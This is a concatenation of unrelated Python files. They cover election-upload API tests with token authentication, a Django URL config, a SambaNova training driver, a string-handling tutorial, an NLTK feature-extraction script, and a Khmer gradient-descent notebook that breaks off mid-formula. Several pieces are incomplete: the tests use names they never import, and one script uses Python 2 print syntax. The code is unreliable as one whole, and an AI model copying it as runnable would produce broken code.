from webtest import TestApp as Client
from webtest import Upload
from unittest.mock import patch
def add_data_source(client, name='name', upload_type='vote', fill=False):
    """Create a data source (and, with fill=True, a matching item) via the UI.

    Returns (source id, upload token).
    NOTE(review): the ``name`` parameter is accepted but the form is always
    filled with the literal 'source' — confirm whether that is intended.
    """
    login(client)
    manage = client.get('/manage/sources/new-source')
    manage.form['name'] = 'source'
    manage.form['upload_type'] = upload_type
    manage = manage.form.submit().follow()
    # The page heading renders '<something>/<token>'; take the token part.
    token = manage.pyquery(('h2 small')).text().split('/')[1].strip()
    id_ = manage.request.url.split('/source/')[1].split('/')[0]
    if fill:
        # Create the vote/election the source item will point at ...
        if upload_type == 'vote':
            manage = client.get('/manage/votes/new-vote')
            manage.form['vote_de'] = 'item'
            manage.form['date'] = '2015-01-01'
            manage.form['domain'] = 'federation'
            manage.form.submit()
        else:
            manage = client.get('/manage/elections/new-election')
            manage.form['election_de'] = 'item'
            manage.form['date'] = '2015-01-01'
            manage.form['mandates'] = 1
            manage.form['election_type'] = upload_type
            manage.form['domain'] = 'federation'
            manage.form.submit()
        # ... then link it with district '1' and number '2'.
        manage = client.get('/manage/source/{}/items/new-item'.format(id_))
        manage.form['item'] = 'item'
        manage.form['district'] = '1'
        manage.form['number'] = '2'
        manage = manage.form.submit().follow()
    return id_, token
def regenerate_token(client, id_):
    """Regenerate the upload token of data source ``id_`` and return the new token."""
    login(client)
    client.get('/data-source/{}/generate-token'.format(id_)).form.submit()
    page = client.get('/manage/source/{}/items'.format(id_))
    # The heading renders '<something>/<token>'; take the token part.
    return page.pyquery('h2 small').text().split('/')[1].strip()
def test_view_wabstic_authenticate(election_day_app_zg):
    """Uploads require HTTP basic auth with the source's *current* token."""
    client = Client(election_day_app_zg)
    urls = ('vote', 'majorz', 'proporz')
    def post(url):
        return client.post('/upload-wabsti-{}'.format(url), expect_errors=True)
    # No credentials, wrong password, and no-token-yet all yield 403.
    assert all((post(url).status_code == 403 for url in urls))
    client.authorization = ('Basic', ('', 'password'))
    assert all((post(url).status_code == 403 for url in urls))
    id_, token = add_data_source(Client(election_day_app_zg))
    assert all((post(url).status_code == 403 for url in urls))
    client.authorization = ('Basic', ('', token))
    assert all((post(url).status_code == 200 for url in urls))
    # Regenerating invalidates the previously issued token.
    regenerate_token(Client(election_day_app_zg), id_)
    assert all((post(url).status_code == 403 for url in urls))
def test_view_wabstic_translations(election_day_app_zg):
    """Validation errors are localised according to the Accept-Language header.

    An unknown locale falls back to the default (English) messages.
    """
    id_, token = add_data_source(Client(election_day_app_zg), fill=True)
    client = Client(election_day_app_zg)
    client.authorization = ('Basic', ('', token))
    params = (
        ('sg_geschaefte', Upload('sg_geschaefte.txt', 'a'.encode('utf-8'))),
        ('sg_gemeinden', Upload('sg_gemeinden.txt', 'a'.encode('utf-8'))),
    )
    # Default
    result = client.post('/upload-wabsti-vote')
    assert result.json['errors']['sg_gemeinden'] == ['This field is required.']
    result = client.post('/upload-wabsti-majorz')
    assert result.json['errors']['data_source'] == [
        'The data source is not configured properly'
    ]
    result = client.post('/upload-wabsti-vote', params=params)
    assert result.json['errors']['item'][0]['message'] == (
        'Not a valid xls/xlsx file.'
    )
    # Invalid header
    headers = [('Accept-Language', 'xxx')]
    result = client.post('/upload-wabsti-vote', headers=headers)
    assert result.json['errors']['sg_gemeinden'] == ['This field is required.']
    result = client.post('/upload-wabsti-majorz', headers=headers)
    assert result.json['errors']['data_source'] == [
        'The data source is not configured properly'
    ]
    result = client.post('/upload-wabsti-vote', headers=headers, params=params)
    assert result.json['errors']['item'][0]['message'] == (
        'Not a valid xls/xlsx file.'
    )
    # German
    headers = [('Accept-Language', 'de_CH')]
    result = client.post('/upload-wabsti-vote', headers=headers)
    assert result.json['errors']['sg_gemeinden'] == [
        'Dieses Feld wird benötigt.'
    ]
    result = client.post('/upload-wabsti-majorz', headers=headers)
    assert result.json['errors']['data_source'] == [
        'Die Datenquellekonfiguration ist ungültig'
    ]
    result = client.post('/upload-wabsti-vote', headers=headers, params=params)
    assert result.json['errors']['item'][0]['message'] == (
        'Keine gültige XLS/XLSX Datei.'
    )
    # Italian
    headers = [('Accept-Language', 'it_CH')]
    result = client.post('/upload-wabsti-vote', headers=headers)
    assert result.json['errors']['sg_gemeinden'] == [
        'Questo campo è obbligatorio.'
    ]
    result = client.post('/upload-wabsti-majorz', headers=headers)
    assert result.json['errors']['data_source'] == [
        'L\'origine dati non è configurata correttamente'
    ]
    result = client.post('/upload-wabsti-vote', headers=headers, params=params)
    assert result.json['errors']['item'][0]['message'] == (
        'Nessun file XLS/XLSX valido.'
    )
def test_view_wabstic_vote(election_day_app_zg):
    """A valid vote upload dispatches to import_vote_wabstic with district/number."""
    id_, token = add_data_source(Client(election_day_app_zg), fill=True)
    client = Client(election_day_app_zg)
    client.authorization = ('Basic', ('', token))
    params = [
        (name, Upload(f'{name}.csv', 'a'.encode('utf-8')))
        for name in ('sg_geschaefte', 'sg_gemeinden')
    ]
    with patch(
        'onegov.election_day.views.upload.wabsti_exporter.import_vote_wabstic'
    ) as import_:
        result = client.post('/upload-wabsti-vote', params=params)
        assert import_.called
        # District '1' and number '2' come from the data source item.
        assert '1' in import_.call_args[0]
        assert '2' in import_.call_args[0]
        assert result.json['status'] == 'success'
def test_view_wabstic_majorz(election_day_app_zg):
    """A valid majorz upload dispatches to import_election_wabstic_majorz."""
    id_, token = add_data_source(
        Client(election_day_app_zg),
        upload_type='majorz',
        fill=True
    )
    client = Client(election_day_app_zg)
    client.authorization = ('Basic', ('', token))
    # All five WabstiC majorz export files are required.
    params = [
        (name, Upload(f'{name}.csv', 'a'.encode('utf-8')))
        for name in (
            'wm_wahl',
            'wmstatic_gemeinden',
            'wm_gemeinden',
            'wm_kandidaten',
            'wm_kandidatengde'
        )
    ]
    with patch(
        'onegov.election_day.views.upload.wabsti_exporter'
        '.import_election_wabstic_majorz'
    ) as import_:
        result = client.post('/upload-wabsti-majorz', params=params)
        assert import_.called
        # District '1' and number '2' come from the data source item.
        assert '1' in import_.call_args[0]
        assert '2' in import_.call_args[0]
        assert result.json['status'] == 'success'
def test_view_wabstic_proporz(election_day_app_zg):
    """A valid proporz upload dispatches to import_election_wabstic_proporz."""
    id_, token = add_data_source(
        Client(election_day_app_zg),
        upload_type='proporz',
        fill=True
    )
    client = Client(election_day_app_zg)
    client.authorization = ('Basic', ('', token))
    # All eight WabstiC proporz export files are required.
    params = [
        (name, Upload(f'{name}.csv', 'a'.encode('utf-8')))
        for name in (
            'wp_wahl',
            'wpstatic_gemeinden',
            'wp_gemeinden',
            'wp_listen',
            'wp_listengde',
            'wpstatic_kandidaten',
            'wp_kandidaten',
            'wp_kandidatengde',
        )
    ]
    with patch(
        'onegov.election_day.views.upload.wabsti_exporter'
        '.import_election_wabstic_proporz'
    ) as import_:
        result = client.post('/upload-wabsti-proporz', params=params)
        assert import_.called
        # District '1' and number '2' come from the data source item.
        assert '1' in import_.call_args[0]
        assert '2' in import_.call_args[0]
        assert result.json['status'] == 'success'
def test_create_elections_wabsti_proporz(election_day_app_sg):
    """Creating elections from a WabstiC WP_Wahl file builds a full compound.

    Also checks that a re-upload is rejected once elections exist and that a
    wrong token yields 403.
    """
    test_file = module_path(
        'tests.onegov.election_day', 'fixtures/wabstic_243/WP_Wahl.csv')
    id_, token = add_data_source(
        Client(election_day_app_sg),
        name='Verbundene Wahlen KR',
        upload_type='proporz',
        fill=False
    )
    params = [
        ('wp_wahl', Upload(test_file, content_type='text/plain')),
        ('wp_listen', Upload('wp_listen.csv', 'a'.encode('utf-8'),
                             content_type='text/plain'))
    ]
    client = Client(election_day_app_sg)
    client.authorization = ('Basic', ('', token))
    # Request a compound with doubly-proportional (Pukelsheim) allocation.
    query_params = '?create_compound=1&pukelsheim=1'
    result = client.post(
        '/create-wabsti-proporz' + query_params,
        params=params,
        headers=[('Accept-Language', 'de_CH')]
    )
    print(result.json)
    assert result.json['status'] == 'success'
    session = election_day_app_sg.session()
    compound = session.query(ElectionCompound).first()
    assert compound.title == 'Wahl der Mitglieder des Kantonsrates'
    assert compound.shortcode == 'Kantonsratswahl_2016'
    assert compound.associations.count() == 8
    assert compound.pukelsheim is True
    elections = session.query(Election).filter_by(date=date(2016, 2, 28))
    elections = elections.order_by(Election.shortcode)
    assert compound.elections == elections.all()
    for e in compound.elections:
        print(f'{e.title} - {e.shortcode}')
    test_election = elections.first()
    assert test_election.shortcode == 'Kantonsratswahl (RH)'
    assert test_election.title == 'Wahl der Mitglieder des Kantonsrates ' \
        '(Wahlkreis Rheintal)'
    # Test Re-Upload
    result = client.post(
        '/create-wabsti-proporz',
        params=params,
        headers=[('Accept-Language', 'de_CH')]
    )
    error = 'Die Datenquelle hat bereits Verbindungen zu Wahlen, ' \
        'die erstellt wurden.'
    assert result.json['errors']['data_source'][0] == error
    # Test wrong token
    wrong_token = str(uuid4())
    client = Client(election_day_app_sg)
    client.authorization = ('Basic', ('', wrong_token))
    result = client.post(
        '/create-wabsti-proporz',
        params=params,
        headers=[('Accept-Language', 'de_CH')],
        status=403
    )
def test_create_wabstic_proporz_election_errors(election_day_app_sg):
    """Malformed WP_Wahl rows are reported per line with filename context."""
    test_file = module_path(
        'tests.onegov.election_day', 'fixtures/wabstic_243/WP_Wahl_errors.csv')
    id_, token = add_data_source(
        Client(election_day_app_sg),
        name='Verbundene Wahlen KR',
        upload_type='proporz',
        fill=False
    )
    params = [
        ('wp_wahl', Upload(test_file, content_type='text/plain'))
    ]
    client = Client(election_day_app_sg)
    client.authorization = ('Basic', ('', token))
    result = client.post(
        '/create-wabsti-proporz',
        params=params,
        headers=[('Accept-Language', 'de_CH')]
    )
    assert result.json['status'] == 'error'
    errors = result.json['errors']
    # The fixture contains a bad date on line 2 and an empty mandate on line 3.
    assert errors == [
        dict(
            message="time data '28.02.AA' does not match format '%d.%m.%Y'",
            filename='wp_wahl',
            line=2
        ),
        dict(
            message='Leerer Wert: mandate',
            filename='wp_wahl',
            line=3
        )
    ]
|
from django.urls import path
from . import views
# URL namespace: reverse as 'tag:tag-list', 'tag:games-by-tag', etc.
app_name = 'tag'
urlpatterns = [
    path('tag_list/', views.TagListView.as_view(),
         name='tag-list'),
    path('tag_create/', views.TagCreateView.as_view(),
         name='tag-create'),
    # <tag_id> is captured as a plain string path segment.
    path('tag_delete/<tag_id>', views.TagDeleteView.as_view(),
         name='tag-delete'),
    path('games_by_tag/<tag_id>', views.GamesByTagView.as_view(),
         name='games-by-tag')
]
|
"""SambaNova boilerplate main method."""
#import argparse
import sys
#from typing import Tuple
#import torch
#import torch.nn as nn
#import torchvision
from sambaflow import samba
import sambaflow.samba.utils as utils
from sambaflow.samba.utils.argparser import parse_app_args
from sambaflow.samba.utils.pef_utils import get_pefmeta
#from sambaflow.samba.utils.dataset.mnist import dataset_transform
from sambaflow.samba.utils.common import common_app_driver
from sn_boilerplate_args import *
from sn_boilerplate_model import *
from sn_boilerplate_other import *
def consumeVariables(X, Y):
    """No-op that formally references X and Y.

    SambaNova's tracing picks the input tensors up behind the scenes; this
    call only makes the data flow explicit to the reader.
    """
    _ = (X, Y)  # intentionally unused
def main(argv):
    """Build the FFNLogReg model and dispatch on args.command
    (compile / test / run / measure-performance)."""
    utils.set_seed(256)  # fixed seed for reproducible runs
    args = parse_app_args(argv=argv, common_parser_fn=add_args, run_parser_fn=add_run_args)
    # Fake inputs supply the tensor shapes the tracer/compiler needs.
    X, Y = FFNLogReg.get_fake_inputs(args)
    model = FFNLogReg(args.num_features, args.ffn_dim_1, args.ffn_dim_2, args.num_classes)
    # Note: Keep these two lines together and in the same order. The second line magically uses X and Y behind the scenes.
    consumeVariables(X, Y)
    samba.from_torch_(model)
    inputs = (X, Y)
    # Instantiate an optimizer.
    # Note: --inference can be used with both compile and run commands.
    if args.inference:
        optimizer = None  # inference-only graphs need no optimizer
    else:
        optimizer = samba.optim.SGD(model.parameters(),
                                    lr=args.lr,
                                    momentum=args.momentum,
                                    weight_decay=args.weight_decay)
    name = 'ffn_mnist_torch'
    if args.command == "compile":
        # Run model analysis and compile, this step will produce a PEF.
        samba.session.compile(model,
                              inputs,
                              optimizer,
                              name=name,
                              app_dir=utils.get_file_dir(__file__),
                              config_dict=vars(args),
                              pef_metadata=get_pefmeta(args, model))
    elif args.command == "test":
        # Map the traced graph onto the compiled PEF, then evaluate.
        samba.utils.trace_graph(model, inputs, optimizer, pef=args.pef, mapping=args.mapping)
        outputs = model.output_tensors
        test(args, model, inputs, outputs)
    elif args.command == "run":
        # Map the traced graph onto the compiled PEF, then train.
        samba.utils.trace_graph(model, inputs, optimizer, pef=args.pef, mapping=args.mapping)
        train(args, model, optimizer)
    elif args.command == "measure-performance":
        # Contact SambaNova if output gradients are needed to calculate loss on the host.
        common_app_driver( args=args,
                           model=model,
                           inputs=inputs,
                           name=name,
                           optim=optimizer,
                           squeeze_bs_dim=False,
                           get_output_grads=False,
                           app_dir=utils.get_file_dir(__file__))
if __name__ == '__main__':
    # Entry point: forward CLI args (minus the program name) to main().
    main(sys.argv[1:])
|
# Strings are one of the most common data types in any programming language.
# A string literal is just defining a string as such
name = "Adam"

# String interpolation: putting variables into a string
greeeting = "Hello " + name + " it is great to meet you!"
# f-strings interpolate values (and expressions) into a string using {}
greeeting = f"Hello {name} it is awesome to see you! {7<8}"
# format method of strings
greeeting = "Hello {} is is great to see you! Also something else {}".format(name, "Wassup")
print(greeeting)

# String slicing is being able to take substrings out of a larger string
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# start at index 0, stop before index 3 (the stop index is exclusive)
abc = alphabet[0:3]
jk = alphabet[9:11]

# negative index: -1 is the last element, -2 second to last, etc.
# print(alphabet[len(alphabet)-1])
# print(alphabet[-1])

# The third slice argument is the step.
# BUGFIX: this used alphabet[0::-2], which walks *backwards* from index 0 and
# yields just "A"; a positive step of 2 gives every other letter as intended.
everyother = alphabet[0::2]
# print(everyother)

# reverse a string in python
zyx = alphabet[::-1]
print(zyx)

l = list(alphabet)  # generates a brand new list
del l[2]
print("".join(l))  # brand new string

# you can make anything a string by using the str function
x = 100
y = str(x)
print(type(y))

# strings are immutable: they cannot be altered once created
phrase = "hello everyone"
# phrase[8] = "A"  # would raise TypeError because strings CANNOT be altered
|
from nltk import bigrams,trigrams
import string
import nltk
from collections import Counter
# Base directory of the grader project and the relative PDTB input folder.
mainPath = "./auto-grader/ArgumentDetection/"
# NOTE(review): this shadows the builtin input(); kept for compatibility with
# the script below, which uses it only as a path fragment.
input = 'data/pdtb/input/'
def listModals(postags, type, dict_x):
    """Accumulate counts of modal verbs into dict_x.

    postags: iterable of (word, tag) pairs; words whose tag contains 'MD'
    are counted. Keys are '<type>|||<word>' (e.g. 'SOURCE|||can') and the
    counts accumulate across calls so dict_x can be built over many clauses.
    """
    counts = Counter(word if 'MD' in tag else None for word, tag in postags)
    for word in counts:
        if word is not None:
            key = type + '|||' + word
            # BUGFIX: the original looked up 'word|||type' but stored under
            # 'type|||word', so the previous total was never found and each
            # call overwrote the count instead of accumulating it.
            old = dict_x.get(key)
            if old is None:
                old = 0
            dict_x[key] = old + counts[word]
def wps(s_arg_tokens, t_arg_tokens):
    """Return every source/target word pair as 'source_target' strings."""
    return [left + '_' + right
            for left in s_arg_tokens
            for right in t_arg_tokens]
def fthree(arg_tokens, type):
    """Return a one-element list: '<type>|||w1_w2_w3' from (up to) the
    first three tokens of arg_tokens."""
    prefix = arg_tokens[:3]
    return [type + '|||' + '_'.join(prefix)]
def firstlast(arg_token, type):
    """Wrap a single boundary token as ['<type>|||<token>']."""
    return [type + '|||' + arg_token]
def counts(list_x, dict_x):
    """Increment dict_x's tally for every item in list_x; returns dict_x."""
    for item in list_x:
        dict_x[item] = dict_x.get(item, 0) + 1
    return dict_x
def write_to_file(file_name, dict_x):
    """Dump dict_x to the open file object as 'key<TAB>value' lines."""
    for key in dict_x:
        file_name.write("%s\t%s\n" % (key, dict_x[key]))
# Which PDTB dump to read and which relation class to extract features for.
file_type = "alldata"
rel_type = 'contingency'
# Alternative corpora kept for reference (Stab, ETS, SR variants).
#wordpairs = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.wp.txt', "w")
#firstthreeFile = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.firstthree.txt', "w")
#modalFile = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.modal.txt',"w")
#firstlastFile = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.firstlast.txt', "w")
#input_tree = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.txt.alldata',"r")
#wordpairs = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + '.wp.txt', "w")
#firstthreeFile = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + '.firstthree.txt', "w")
#firstlastFile = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + '.firstlast.txt', "w")
#modalFile = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + 'modal.txt',"w")
#input_tree = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.txt.' + file_type,"r")
#wordpairs = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + '.wp.txt', "w")
#firstthreeFile = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + '.firstthree.txt', "w")
#firstlastFile = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + '.firstlast.txt', "w")
#modalFile = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + 'modal.txt',"w")
#input_tree = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.' + file_type,"r")
# One output file per feature family; one input file with the PDTB rows.
wordpairs = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + '.wp.txt', "w")
firstthreeFile = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + '.firstthree.txt', "w")
firstlastFile = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + '.firstlast.txt', "w")
modalFile = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + 'modal.txt',"w")
input_tree = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.' + file_type,"r")
input_tree.readline()  # skip the header line
# Collect (arg1, arg2) clause pairs for non-explicit relations of rel_type.
# Columns (after lowercasing/tab-split): [2]=relation kind, [4]=sense label,
# [5]/[6]=the two argument spans -- presumed from the indexing below; confirm
# against the dump's header.
clauses = []
for line in input_tree:
    temp = line.lower().split("\t")
    if temp[2] != 'explicit':
        if temp[4].startswith(rel_type):
            comps = temp[5],temp[6]
            clauses.append(comps)
# Feature accumulators: word pairs, modal counts, first-three tokens,
# first/last tokens.
wp = {}
modals = {}
firstthree = {}
fl = {}
i = 0
for clause in clauses:
    # print clause
    # clause = clause.translate(string.maketrans("",""), string.punctuation)
    s_arg = clause[0]
    t_arg = clause[1]
    #we have weird use of commas and periods etc.
    #lets take care of some manually
    s_arg = s_arg.replace(',',' ')
    t_arg = t_arg.replace(',',' ')
    s_arg_tokens = nltk.word_tokenize(s_arg)
    t_arg_tokens = nltk.word_tokenize(t_arg)
    # Cross-product word-pair features between the two arguments.
    counts(wps(s_arg_tokens,t_arg_tokens),wp)
    # First-three-token features per side.
    counts(fthree(s_arg_tokens,'SOURCE'),firstthree)
    counts(fthree(t_arg_tokens,'TARGET'),firstthree)
    # First and last token per side.
    # NOTE(review): an empty token list would raise IndexError here -- the
    # data is presumed to never yield empty arguments; confirm.
    counts(firstlast(s_arg_tokens[0],'SOURCE'),fl)
    counts(firstlast(t_arg_tokens[0],'TARGET'),fl)
    counts(firstlast(s_arg_tokens[-1],'SOURCE'),fl)
    counts(firstlast(t_arg_tokens[-1],'TARGET'),fl)
    # Modal-verb counts from POS tags.
    s_posTags = nltk.pos_tag(s_arg_tokens)
    t_posTags = nltk.pos_tag(t_arg_tokens)
    listModals(s_posTags,'SOURCE',modals)
    listModals(t_posTags,'TARGET',modals)
    i=i+1
    if i % 100 == 0 and i > 0:
        print 'finished ' + str(i) + ' lines'
# Dump each accumulator to its file and close everything.
write_to_file(wordpairs,wp)
write_to_file(firstthreeFile,firstthree)
write_to_file(modalFile,modals)
write_to_file(firstlastFile,fl)
wordpairs.close()
modalFile.close()
firstthreeFile.close()
firstlastFile.close()
|
#!/usr/bin/env python
# coding: utf-8
# # វិធីសាស្រ្តបរមាកម្មតាមរយៈ SGD
# ក្នុងមេរៀនមុនយើងបានសិក្សាអំពីម៉ូឌែលតម្រែតម្រង់លីនេអ៊ែរ ដែលត្រូវបានប្រើប្រាស់សម្រាប់សិក្សាពីការទំនាក់ទំនងរវាងអថេរពន្យល់និងអថេរគោលដៅ។ ក្នុងការកំណត់តម្លៃប៉ារ៉ាម៉ែត្រនៃម៉ូឌែល(មេគុណតម្រែតម្រង់) យើងបានដោះស្រាយតាមរយៈវិធីសាស្រ្តជាមូលដ្ឋាននៃគណិតវិទ្យាវិភាគ។
#
# ប៉ុន្តែក្នុងជីវភាពរស់នៅ ករណីភាគច្រើនចំនួននៃអថេរពន្យល់មានចំនួនច្រើនលើសលប់ ដែលធ្វើឱ្យវិមាត្រនៃម៉ាទ្រីសផែនការមានការកើនឡើងខ្ពស់។ ហេតុនេះ វាមានការលំបាកក្នុងការគណនាម៉ាទ្រីសច្រាស់ដូចក្នុងរបៀបខាងលើទោះបីប្រើប្រាស់ម៉ាស៊ីនកុំព្យូទ័រក្តី។
#
# ក្នុងអត្ថបទនេះ យើងនឹងណែនាំវិធីសាស្រ្តកំណត់តម្លៃប៉ាន់ស្មាននៃមេគុណតម្រែតម្រង់ដោយវិធីគណនាដដែលៗលើតម្លៃលេខតាមប្រមាណវិធីងាយៗគឺ Stochastic Gradient Descent (SGD) ។ ដើម្បីងាយស្រួលស្វែងយល់អំពីSGD ជាដំបូងយើងនឹងណែនាំអំពីគំនិត និងការគណនាក្នុងវិធីសាស្រ្ត Gradient Descent ជាមុន។
#
# ## Gradient Descent
#
# ដូចដែលបានបង្ហាញក្នុងអត្ថបទមុន យើងចង់កំណត់យកមេគុណតម្រែតម្រង់ណាដែលធ្វើឱ្យតម្លៃផលបូកការេនៃកម្រិតលម្អៀងតូចបំផុត។ គោលគំនិតក្នុងGradient Descent គឺផ្លាស់ប្តូរតម្លៃនៃមេគុណតម្រែតម្រង់(ប៉ារ៉ាម៉ែត្រ) បន្តិចម្តងៗ ទៅតាមទិសដៅដែលធ្វើឱ្យតម្លៃផលបូកការេនៃកម្រិតលម្អៀងមានការថយចុះ។ អ្នកអាចប្រដូចវិធីនេះទៅនឹងការចុះជំរាលឬចុះពីទីភ្នំ ដោយរំកិលខ្លួនអ្នកបន្តិចម្តងៗ ទៅកាន់ទីដែលទាបជាងកន្លែងដែលអ្នកនៅ។ នៅពេលដែលអ្នករំកិលខ្លួនដល់ទីដែលលែងមានបម្រែបម្រួលនៃរយៈកម្ពស់ អ្នកអាចសន្និដ្ឋានបានថាអ្នកដល់ទីដែលទាបបំផុតហើយ។ ដូចគ្នានេះដែរ នៅក្នុងវិធីសាស្រ្តGradient Descent តាមលក្ខណៈគណិតវិទ្យានៃ gradient (តម្លៃដេរីវេនៃអនុគមន៍ត្រង់ចំនុចណាមួយ) តម្លៃgradientត្រង់ចំណុចណាមួយគឺជាតម្លៃមេគុណប្រាប់ទិសនៃខ្សែកោងត្រង់ចំណុចនោះហើយក៏ជាតម្លៃធំបំផុតនៃបម្រែបម្រួលតម្លៃអនុគមន៍ពេលអ្នកធ្វើបម្រែបម្រួលលើអថេរមិនអាស្រ័យ។
#
# 
#
# រូបខាងលើនេះបង្ហាញអំពីគំនិតក្នុងវិធីសាស្រ្តធ្វើអប្បបរមាកម្មតាម Gradient Descent។ ដូចដែលអ្នកអាចធ្វើការកត់សម្គាល់បាន ពេលខ្លះអ្នកអាចនឹងធ្លាក់ចុះទៅក្នុងទីតាំងដែលជាបរមាធៀបតែមិនមែនជាកន្លែងអប្បបរមាពិតប្រាកដប្រសិនបើទីតាំងនៃការចាប់ផ្តើមរបស់អ្នកមិនប្រសើរ។ ប៉ុន្តែក្នុងករណីធ្វើបរមាកម្មតម្លៃផលបូកការេនៃកម្រិតលម្អៀងរបស់យើង ដោយសារអនុគមន៍ដែលត្រូវធ្វើបរមាកម្មគឺជាអនុគមន៍ដឺក្រេទី២ ហេតុនេះយើងមិនមានការព្រួយបារម្ភក្នុងករណីនេះឡើយ។
# ពេលនេះ យើងពិនិត្យលើការគណនាក្នុងវិធីសាស្រ្ត Gradient Descent។
#
# យើងសិក្សាលើអនុគមន៍ដែលយកតម្លៃស្កាលែ $f\left(\pmb{x}\right)$ ដែល $\pmb{x}\in\mathbb{R}^d$។ សន្មតថាអនុគមន៍នេះយកតម្លៃអប្បបរមាត្រង់ចំណុច $\pmb{x}^\ast$ ។ វិធីសាស្រ្ត Gradient Descent អាចឱ្យយើងគណនាតម្លៃ(ប្រហែល)នៃ $\pmb{x}^\ast$ បានដោយចាប់ផ្តើមពីតម្លៃ$\ \pmb{x}^{\left(0\right)}\ $ណាមួយ រួចធ្វើការផ្លាស់ប្តូរតម្លៃនេះតាមការគណនាដូចខាងក្រោម។
#
# $$\pmb{x}^{\left(t+1\right)}=\pmb{x}^{\left(t\right)}-\eta_t\left.\frac{\partial f\left(\pmb{x}\right)}{\partial\pmb{x}}\right|_{\pmb{x}=\pmb{x}^{\left(\pmb{t}\right)}}$$
#
# នៅទីនេះ$t=0,1,\ldots$ គឺជាលេខរៀងនៃការផ្លាស់ប្តូរតម្លៃអថេរ$\pmb{x}$។ $\frac{\partial f\left(\pmb{x}\right)}{\partial\pmb{x}} $ គឺជាដេរីវេដោយផ្នែកនៃអនុគមន៍$\ f $ធៀបនឹងអថេរ$ \pmb{x} $ឬហៅថា gradient ។$ \eta_t $គឺជាកម្រិតនៃការផ្លាស់ប្តូរតម្លៃអថេរដោយគ្រប់គ្រងលើឥទ្ធិពលនៃតម្លៃgradient។ នៅក្នុង Machine Learning វាត្រូវបានហៅថាជា អត្រារៀនឬ learning rate ។ ជាទូទៅតម្លៃនៃ$\eta_t$ ត្រូវបានកំណត់យកចន្លោះ០និង១ដោយតម្លៃយ៉ាងតូច។ យើងអាចកំណត់លក្ខខណ្ឌសម្រាប់បញ្ចប់ការផ្លាស់ប្តូរតម្លៃនៃអថេរបាន ដោយយកពេលដែលតម្លៃដាច់ខាតនៃ gradient យកតម្លៃសូន្យឬក្បែរសូន្យ។
#
# ពិនិត្យលើករណីគម្រូងាយមួយ $f\left(x\right)=x^2-2x-3 $។ ករណីនេះយើងដឹងច្បាស់ថាតម្លៃអប្បបរមានៃអនុគមន៍គឺ $-4$ នៅពេលដែល $x^\ast=1$។ យើងនឹងផ្ទៀងផ្ទាត់ជាមួយតម្លៃដែលគណនាតាមរយៈGradient Descent។
#
# ដំបូងយើងគណនាអនុគមន៍ដេរីវេ $ \frac{df\left(x\right)}{dx}=2x-2 $និង កំណត់យកអត្រា$\ \eta=0.1 $ថេរ។ យើងចាប់ផ្តើមពីចំណុច$ x^{\left(0\right)}=0\ \ ,\ f\left(x^{\left(0\right)}\right)=-3 $។ ដោយផ្លាស់ប្តូរតម្លៃអថេរតាមរយៈGradient Descent ខាងលើយើងបានបម្រែបម្រួលនៃតម្លៃអថេរនិងតម្លៃអនុគមន៍ដូចតារាងខាងក្រោម។
#
# | $\pmb{t}$ | $x^{(t)}$ | $ \frac{df\left(x\right)}{dx}$ | $f(x) $ |
# |:-: |- |- |- |
# | 0 | 0.00 | -2.00 | -3.00 |
# | 1 | 0.20 | -1.60 | -3.36 |
# | 2 | 0.36 | -1.28 | -3.59 |
# | $\vdots$ | $\vdots$ | $\vdots$ | $\vdots$ |
# | 44 | 0.999946 | -0.000109 | -4.00 |
# | 45 | 0.999956 | -0.000087 | -4.00 |
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
# In[2]:
def f(x):
    """Quadratic objective f(x) = x**2 - 2*x - 3 (minimum -4 at x = 1)."""
    value = x ** 2 - 2 * x - 3
    return value
def g(x):
    """Derivative of f: g(x) = 2*x - 2."""
    slope = 2 * x - 2
    return slope
def sd(f, g, x=0., eta=0.01, eps=1e-4):
    """Minimise f by gradient descent using its derivative g.

    Starts at x, repeatedly steps x <- x - eta * g(x), and stops once
    |g(x)| < eps.  Returns the full history as a list of dicts with keys
    't' (1-based step), 'x', 'fx', and 'gx'; the final entry is the result.
    """
    history = []
    step = 1
    while True:
        slope = g(x)
        history.append({'t': step, 'x': x, 'fx': f(x), 'gx': slope})
        if abs(slope) < eps:
            break
        x = x - eta * slope
        step += 1
    return history
# In[3]:
# Run gradient descent on f starting at x=0 with learning rate 0.1;
# the last history entry holds the converged x / f(x) / gradient.
H = sd(f, g, x = 0, eta=0.1)
H[-1]
# In[4]:
# Plot f(x) against the iteration number to visualise convergence.
fig = plt.figure(dpi=150)
ax = fig.add_subplot(1,1,1)
ax.plot(
    [h['t'] for h in H],
    [h['fx'] for h in H],
    'x-'
)
ax.set_xlabel('$t$')
ax.set_ylabel('$f(x)$')
ax.grid()
# យើងត្រលប់ទៅកាន់ម៉ូឌែលតម្រែតម្រង់របស់យើងវិញ។ អនុគមន៍ដែលយើងចង់ធ្វើអប្បបរមាកម្មគឺ $E\left(\pmb{\beta}\right)$ ដោយយក$\ \pmb{\beta} $ជាអថេរ។
#
# $$
